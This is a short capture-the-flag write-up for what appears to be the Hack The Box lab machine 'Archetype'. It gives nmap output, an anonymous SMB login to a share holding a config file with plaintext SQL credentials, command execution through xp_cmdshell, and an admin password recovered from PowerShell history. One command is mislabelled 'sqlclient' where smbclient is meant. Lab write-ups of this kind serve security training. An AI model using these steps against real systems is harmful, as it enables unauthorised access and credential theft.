Archetype
Personal Rating: Very Easy
Enumeration
A first nmap scan reveals a few interesting ports and shows its a Windows machine:
sudo nmap -A <IP>
PORT STATE SERVICE VERSION
# 135/tcp open msrpc Microsoft Windows RPC
# 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
# 445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
# 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
# Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
#| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
#|_ TCP port: 1433
| smb-os-discovery:
#| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-03T10:30:50-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-03T17:30:51
|_ start_date: N/APillaging and SQL Access
With smbclient I could login anonymously and fetch this config file containing a password:
sqlclient -N \\\\10.10.10.27\\backups\\
smb: \> get prod.dtsConfig<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>The password could be used to authenticate to the sql client with sql_svc:M3g4c0rp123
python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-authSQL OS Commands
In the SQL shell I could use the commands to execute os commands and get the user flag:
enable_xp_cmdshell
RECONFIGURE
xp_cmdshell type \Users\sql_svc\Desktop\user.txt3e7b<SNIP>21a3Further Pillaging
The admin password was contained in the powershell history, which could be found by running an enumeration script or with manual pillaging:
MEGACORP_4dm1n!!From here, a tool like psexec or evil-winrm could be used to access the host and get the admin flag.
b91cc<SNIP>8528Last updated